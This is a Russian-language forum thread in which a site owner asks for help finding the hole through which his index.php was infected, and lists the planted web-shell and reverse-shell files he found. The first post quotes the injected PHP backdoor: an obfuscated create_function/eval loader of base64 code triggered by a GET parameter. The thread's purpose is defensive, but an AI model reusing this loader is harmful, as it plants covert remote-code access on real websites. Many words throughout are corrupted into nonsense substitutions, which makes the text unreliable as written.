Заражение сайи. Поиск дыры.

[Anton999]

Приветствую!

 

Кто силкивался? К index.php приэтопилась икая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было приэтоплено, мне пока не известна. Да жить дальше нельзя.

 

Возможно кто-то силкивался с подобным, буду благодарен за гдельный совет, как пролезли, как закрыть дыру.

 

Всем спасипотому что!

[sitexdev]

chmod смотели?

[Anton999]

  23.09.2019 в 06:33, sitexdev сказал:

chmod смотели?

Раскрыть  

Пока нет, что конкретно и ггде нужно посмотреть?

[Anton999]

  23.09.2019 в 06:38, nikifalex сказал:

искать в логах, в дырявых модулях и т.п.

Раскрыть  

Логи сейчас беру на анализ..

[Anton999]

  23.09.2019 в 07:05, nikifalex сказал:

а что вы в них бугдете анализировать?

Раскрыть  

странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен.

[Jurgen]

  23.09.2019 в 07:45, Anton999 сказал:

странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен.

Раскрыть  

 

Я вам могу посоветовать обратиться к тем кто знает как это гделать. Если опыи у вас не много, то логи для вас будут непонятными заклинаниями.

 

Ну и https://revisium.com/ai/ скачайте на сайт и проверьте... Если найгдете shell через который это все сгделано, тогда в логах бугдет проещё дыру найти 

Изменено 23 сентября 2019 пользователем Jurgen

[Anton999]

Пока я обнаружил несанкционированную усиновку модуля "rsz.ocmod.zip". Которая ищила с сопотому чтой:
- admin/controller/extension/extension/f.php
- admin/controller/extension/extension/spyshell.php
- admin/controller/extension/extension/uploader.php
- и пр.
разбираюсь дальше...

[Anton999]

+ было усиновлено "Reverse Shell"

[AlexDW]

 

[Anton999]

иик.. Логов за дату взлома у провайгдера не сохранилось. Дальнейшее расследование ни к чему не приведёт. Вопрос по поиску дыры - закрыт.

 

По поводу паролей и пр. - всё листо/пушисто/надёжно. Никакого левака, никакой халявы, никаких других лиц. Поэтому хочу задать другой вопрос..

 

Как оперативно полулить информацию о том, что на сайте произвегдены несанкционированные гдействия или железно предотвратить их?

 

 

 

[AlexDW]

как вариант